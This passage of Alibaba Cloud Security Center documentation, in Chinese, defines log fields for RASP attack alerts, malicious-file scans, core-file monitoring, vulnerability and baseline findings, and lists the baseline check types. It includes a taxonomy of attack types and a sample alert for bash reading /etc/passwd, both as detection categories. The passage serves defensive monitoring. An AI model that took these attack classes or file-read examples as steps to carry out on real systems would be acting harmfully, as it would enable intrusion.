[java.io.FileInputStream.<init>(FileInputStream.java:123), java.io.FileInputStream.<init>(FileInputStream.java:93), com.example.vulns.controller.FileController.IORead(FileController.java:75), sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method), sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)......]

time

触发告警的时间。

2023-10-09 15:19:15

timestamp

触发告警的时间戳,单位为毫秒。

1696835955070

type

攻击类型。取值:

  • attach:恶意Attach。

  • beans:恶意beans绑定。

  • classloader:恶意类加载。

  • dangerous_protocol:危险协议使用。

  • dns:恶意DNS查询。

  • engine:引擎注入。

  • expression:表达式注入。

  • file:恶意文件读写。

  • file_delete:任意文件删除。

  • file_list:目录遍历。

  • file_read:任意文件读取。

  • file_upload:恶意文件上传。

  • jndi:JNDI注入。

  • jni:JNI注入。

  • jstl:JSTL任意文件包含。

  • memory_shell:内存马注入。

  • rce:命令执行。

  • read_object:反序列化攻击。

  • reflect:恶意反射调用。

  • sql:SQL注入。

  • ssrf:恶意外连。

  • thread_inject:线程注入。

  • xxe:XXE攻击。

rce

url

请求URL。

http://127.0.0.1:999/xxx

rasp_attack_uuid

攻击事件UUID。

18823b23-7ad4-47c0-b5ac-e5f036a2****

uuid

主机UUID。

23f7ca61-e271-4a8e-bf5f-165596a16****

internet_ip

主机公网IP地址。

1.2.XX.XX

intranet_ip

主机私网IP地址。

172.16.XX.XX

sas_group_name

云安全中心服务器分组名称。

分组1

instance_id

主机实例ID。

i-wz995eivg28f1m**

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

恶意文件检测日志

字段名

说明

示例

bucket_name

Bucket名称。

***-test

event_id

告警ID。

802210

event_name

告警名称。

挖矿程序

md5

文件的MD5值。

6bc2bc******53d409b1

sha256

文件的SHA256值。

f038f9525******7772981e87f85

result

检测结果。取值:

  • 0:文件安全。

  • 1:存在恶意文件。

0

file_path

文件路径。

test.zip/bin_test

etag

OSS文件标识。

6BC2B******853D409B1

risk_level

风险等级。取值:

  • serious:紧急。

  • suspicions:可疑。

  • remind:提醒。

remind

source

检测场景。取值:

  • OSS:在云安全中心控制台执行对阿里云对象存储Bucket内文件的检测。

  • API:通过SDK接入的方式检测恶意文件,支持通过JavaPython方式接入。

OSS

parent_md5

父类文件或压缩包文件的MD5值。

3d0f8045bb9******

parent_sha256

父类文件或压缩包文件的SHA256值。

69b643d6******a3fb859fa

parent_file_path

父类文件或压缩包文件的名称。

test.zip

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

核心文件监控事件日志

字段名

说明

示例

start_time

事件的最新发生时间。单位为秒。

1718678414

uuid

客户端的UUID。

5d83b26b-b**a-4**a-9267-12****

file_path

文件路径。

/etc/passwd

proc_path

进程路径。

/usr/bin/bash

rule_id

命中规则ID。

123

rule_name

规则名称。

file_test_rule

cmdline

命令行。

bash /opt/a

operation

对文件的操作。

READ

risk_level

告警等级。

2

pid

进程ID。

45324

proc_permission

进程权限。

rwxrwxrwx

instance_id

实例ID。

i-wz995eivg2****

internet_ip

互联网IP。

192.0.2.1

intranet_ip

私网IP。

172.16.0.1

instance_name

实例名称。

aegis-test

platform

操作系统类型。

Linux

无代理检测日志

漏洞、基线、恶意样本通用字段

字段名

说明

示例

uuid

服务器UUID。

ad66133a-dc82-4e5e-9659-a49e3****

instance_id

实例ID。

i-2zeg4zldn8zypsfg****

internet_ip

资产的公网IP。

39.104.XX.XX

intranet_ip

资产的私网IP。

192.168.XX.XX

sas_group_name

服务器在云安全中心的资产分组。

default

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

漏洞风险字段

字段名

说明

示例

vul_name

漏洞名称。

imgsca:java:gson:AVD-2022-25647

vul_alias_name

漏洞别名

gson 代码问题漏洞(CVE-2022-25647)

vul_primary_id

漏洞业务主键ID。

990174361

type

漏洞类型。取值:

  • sys:Windows系统漏洞。

  • cve:Linux软件漏洞。

  • sca:应用漏洞(软件成分分析类型)。

  • emg:紧急漏洞。

sca

alert_level

漏洞风险等级。取值:

  • asap:高

  • later:中

  • nntf:低

asap

instance_name

主机名称。

hhht-linux-***

operation

漏洞的处理动作。取值:

  • new:新增

  • update:更新

new

status

漏洞状态信息。取值:

  • 1:未修复

  • 7:已修复

1

tag

漏洞的标签。取值:

  • oval:Linux软件漏洞。

  • system:Windows系统漏洞。

说明

其他类型的漏洞的标签为随机字符串。

oval

基线检查字段

字段名

说明

示例

check_item_name

检查项名称。

设置密码失效时间

check_item_level

检查项风险级别。取值:

  • high:高危

  • medium:中危

  • low:低危

high

check_type

检查项类型。

身份鉴别

risk_level

风险项级别。取值:

  • high:高危

  • medium:中危

  • low:低危

low

operation

操作信息。取值:

  • new:新增。

  • update:更新。

new

risk_name

存在风险的检查项名称。

密码策略合规检测

status

检查项状态信息。取值:

  • 1:未通过

  • 3:已通过

1

sub_type_alias_name

子类型别名(中文)。

阿里云标准-CentOS Linux 7/8安全基线

sub_type_name

基线子类型名称。基线子类型取值请参见基线类型及子类型列表

hc_centos7

type_name

类型名称。

hc_best_secruity

type_alias_name

类型别名(中文)。

最佳安全实践

container_id

容器ID。

b564567427272d46f9b1cc4ade06a85fdf55075c06fdb870818d5925fa86****

container_name

容器名称。

k8s_gamify-answer-bol_gamify-answer-bol-5-6876d5dc78-vf6rb_study-gamify-answer-bol_483a1ed1-28b7-11eb-bc35-00163e01****_0

恶意样本字段

字段名

说明

示例

alert_level

告警事件的危险等级。取值:

  • serious:紧急。

  • suspicious:可疑。

  • remind:提醒。

suspicious

alert_name

恶意样本告警名称。

Suspicious Process-SSH-based

operation

操作信息。取值:

  • new:新增。

  • update:更新。

new

status

恶意样本风险状态信息。取值:

  • 0:未处理

  • 3:已加白

0

suspicious_event_id

告警事件ID。

909361

敏感文件字段

字段名

说明

示例

alert_level

风险等级。取值:

  • high:高危

  • medium:中危

  • low:低危

high

rule_name

文件类型名。

ionic令牌

file_path

敏感文件路径。

/Windows/Microsoft.NET/assembly/GAC_MSIL/System.WorkflowServices/v4.0_4.0.0.0__31bf3856ad36****/System.WorkflowServices.dll

result

检查结果。

{"result":"[\"[\\\"mysql-uqjtwadmin-xxx"}

附录

基线类型及子类型列表

类型名称

子类型名称

描述

hc_exploit

hc_exploit_redis

高危风险利用-Redis未授权访问高危风险

hc_exploit_activemq

高危风险利用-ActiveMQ未授权访问高危风险

hc_exploit_couchdb

高危风险利用-CouchDB未授权访问高危风险

hc_exploit_docker

高危风险利用-Docker未授权访问高危风险

hc_exploit_es

高危风险利用-Elasticsearch未授权访问高危风险

hc_exploit_hadoop

高危风险利用-Hadoop未授权访问高危风险

hc_exploit_jboss

高危风险利用-Jboss未授权访问高危风险

hc_exploit_jenkins

高危风险利用-Jenkins未授权访问高危风险

hc_exploit_k8s_api

高危风险利用Kubernetes-Apiserver未授权访问高危风险

hc_exploit_ldap

高危风险利用-LDAP未授权访问高危风险(Windows环境)

hc_exploit_ldap_linux

高危风险利用-openLDAP未授权访问高危风险(Linux环境)

hc_exploit_memcache

高危风险利用-Memcached未授权访问高危风险

hc_exploit_mongo

高危风险利用-Mongodb未授权访问高危风险

hc_exploit_pgsql

高危风险利用-Postgresql未授权访问高危风险基线

hc_exploit_rabbitmq

高危风险利用-RabbitMQ未授权访问高危风险

hc_exploit_rsync

高危风险利用-rsync未授权访问高危风险

hc_exploit_tomcat

高危风险利用-Apache Tomcat AJP文件包含漏洞风险

hc_exploit_zookeeper

高危风险利用-ZooKeeper未授权访问高危风险

hc_container

hc_docker

阿里云标准-Docker安全基线检查

hc_middleware_ack_master

国际通用安全最佳实践-Kubernetes(ACK) Master节点安全基线检查

hc_middleware_ack_node

国际通用安全最佳实践-Kubernetes(ACK) Node节点安全基线检查

hc_middleware_k8s

阿里云标准-Kubernetes-Master安全基线检查

hc_middleware_k8s_node

阿里云标准-Kubernetes-Node安全基线检查

cis

hc_suse 15_djbh

等保三级-SUSE 15合规基线检查

hc_aliyun_linux3_djbh_l3

等保三级-Alibaba Cloud Linux 3合规基线检查

hc_aliyun_linux_djbh_l3

等保三级-Alibaba Cloud Linux/Aliyun Linux 2合规基线检查

hc_bind_djbh

等保三级-Bind合规基线检查

hc_centos 6_djbh_l3

等保三级-CentOS Linux 6合规基线检查

hc_centos 7_djbh_l3

等保三级-CentOS Linux 7合规基线检查

hc_centos 8_djbh_l3

等保三级-CentOS Linux 8合规基线检查

hc_debian_djbh_l3

等保三级-Debian Linux 8/9/10合规基线检查

hc_iis_djbh

等保三级-IIS合规基线检查

hc_informix_djbh

等保三级-Informix合规基线检查

hc_jboss_djbh

等保三级-Jboss合规基线检查

hc_mongo_djbh

等保三级-MongoDB合规基线检查

hc_mssql_djbh

等保三级-SQL Server合规基线检查

hc_mysql_djbh

等保三级-MySql合规基线检查

hc_nginx_djbh

等保三级-Nginx合规基线检查

hc_oracle_djbh

等保三级-Oracle合规基线检查

hc_pgsql_djbh

等保三级-PostgreSql合规基线检查

hc_redhat 6_djbh_l3

等保三级-Redhat Linux 6合规基线检查

hc_redhat_djbh_l3

等保三级-Redhat Linux 7合规基线检查

hc_redis_djbh

等保三级-Redis合规基线检查

hc_suse 10_djbh_l3

等保三级-SUSE 10合规基线检查

hc_suse 12_djbh_l3

等保三级-SUSE 12合规基线检查

hc_suse_djbh_l3

等保三级-SUSE 11合规基线检查

hc_ubuntu 14_djbh_l3

等保三级-Ubuntu 14合规基线检查

hc_ubuntu_djbh_l3

等保三级-Ubuntu 16/18/20合规基线检查

hc_was_djbh

等保三级-Websphere Application Server合规基线检查

hc_weblogic_djbh

等保三级-Weblogic合规基线检查

hc_win 2008_djbh_l3

等保三级-Windows 2008 R2合规基线检查

hc_win 2012_djbh_l3

等保三级-Windows 2012 R2合规基线检查

hc_win 2016_djbh_l3

等保三级-Windows 2016/2019 合规基线检查

hc_aliyun_linux_djbh_l2

等保二级-Alibaba Cloud Linux/Aliyun Linux 2合规基线检查

hc_centos 6_djbh_l2

等保二级-CentOS Linux 6合规基线检查

hc_centos 7_djbh_l2

等保二级-CentOS Linux 7合规基线检查

hc_debian_djbh_l2

等保二级-Debian Linux 8合规基线检查

hc_redhat 7_djbh_l2

等保二级-Redhat Linux 7合规基线检查

hc_ubuntu_djbh_l2

等保二级-Ubuntu16/18合规基线检查

hc_win 2008_djbh_l2

等保二级-Windows 2008 R2合规基线检查

hc_win 2012_djbh_l2

等保二级-Windows 2012 R2合规基线检查

hc_win 2016_djbh_l2

等保二级-Windows 2016/2019 合规基线检查

hc_aliyun_linux_cis

国际通用安全最佳实践-Alibaba Cloud Linux/Aliyun Linux 2安全基线检查

hc_centos 6_cis_rules

国际通用安全最佳实践-CentOS Linux 6安全基线检查

hc_centos 7_cis_rules

国际通用安全最佳实践-CentOS Linux 7安全基线检查

hc_centos 8_cis_rules

国际通用安全最佳实践-CentOS Linux 8安全基线检查

hc_debian 8_cis_rules

国际通用安全最佳实践-Debian Linux 8安全基线检查

hc_ubuntu 14_cis_rules

国际通用安全最佳实践-Ubuntu 14安全基线检查

hc_ubuntu 16_cis_rules

国际通用安全最佳实践-Ubuntu 16/18/20安全基线检查

hc_win 2008_cis_rules

国际通用安全最佳实践-Windows Server 2008 R2安全基线检查

hc_win 2012_cis_rules

国际通用安全最佳实践-Windows Server 2012 R2安全基线检查

hc_win 2016_cis_rules

国际通用安全最佳实践-Windows Server 2016/2019 R2安全基线检查

hc_kylin_djbh_l3

等保三级-麒麟合规基线检查

hc_uos_djbh_l3

等保三级-Uos合规基线检查

hc_best_security

hc_aliyun_linux

阿里云标准-Alibaba Cloud Linux/Aliyun Linux 2安全基线检查

hc_centos 6

阿里云标准-CentOS Linux 6安全基线检查

hc_centos 7

阿里云标准-CentOS Linux 7/8安全基线检查

hc_debian

阿里云标准-Debian Linux 8/9/10安全基线检查

hc_redhat 6

阿里云标准-Redhat Linux 6安全基线检查

hc_redhat 7

阿里云标准-Redhat Linux 7/8安全基线检查

hc_ubuntu

阿里云标准-Ubuntu安全基线检查

hc_windows_2008

阿里云标准-Windows 2008 R2安全基线检查

hc_windows_2012

阿里云标准-Windows 2012 R2安全基线检查

hc_windows_2016

阿里云标准-Windows 2016/2019 安全基线检查

hc_db_mssql

阿里云标准-SQL server安全基线检查

hc_memcached_ali

阿里云标准-Memcached安全基线检查

hc_mongodb

阿里云标准-MongoDB 3.x版本安全基线检查

hc_mysql_ali

阿里云标准-Mysql安全基线检查

hc_oracle

阿里云标准-Oracle 11g安全基线检查

hc_pgsql_ali

阿里云标准-PostgreSql安全基线检查

hc_redis_ali

阿里云标准-Redis安全基线检查

hc_apache

阿里云标准-Apache安全基线检查

hc_iis_8

阿里云标准-IIS 8安全基线检查

hc_nginx_linux

阿里云标准-Nginx安全基线检查

hc_suse 15

阿里云标准-SUSE Linux 15安全基线检查

tomcat 7

阿里云标准-Apache Tomcat 安全基线检查

weak_password

hc_mongodb_pwd

弱口令-MongoDB登录弱口令检测(支持2.x版本)

hc_weakpwd_ftp_linux

弱口令-FTP登录弱口令检查

hc_weakpwd_linux_sys

弱口令-Linux系统登录弱口令检查

hc_weakpwd_mongodb 3

弱口令-MongoDB登录弱口令检测

hc_weakpwd_mssql

弱口令-SQL Server数据库登录弱口令检查

hc_weakpwd_mysql_linux

弱口令-Mysql数据库登录弱口令检查

hc_weakpwd_mysql_win

弱口令-Mysql数据库登录弱口令检查(Windows版)

hc_weakpwd_openldap

弱口令-Openldap登录弱口令检查

hc_weakpwd_oracle

弱口令-Oracle登录弱口令检测

hc_weakpwd_pgsql

弱口令-PostgreSQL数据库登录弱口令检查

hc_weakpwd_pptp

弱口令-pptpd服务登录弱口令检查

hc_weakpwd_redis_linux

弱口令-Redis数据库登录弱口令检查

hc_weakpwd_rsync

弱口令-rsync服务登录弱口令检查

hc_weakpwd_svn

弱口令-svn服务登录弱口令检查

hc_weakpwd_tomcat_linux

弱口令-Apache Tomcat控制台弱口令检查

hc_weakpwd_vnc

弱口令-VncServer弱口令检查

hc_weakpwd_weblogic

弱口令-Weblogic 12c登录弱口令检测

hc_weakpwd_win_sys

弱口令-Windows系统登录弱口令检查

上一篇:查询日志下一篇:管理日志数据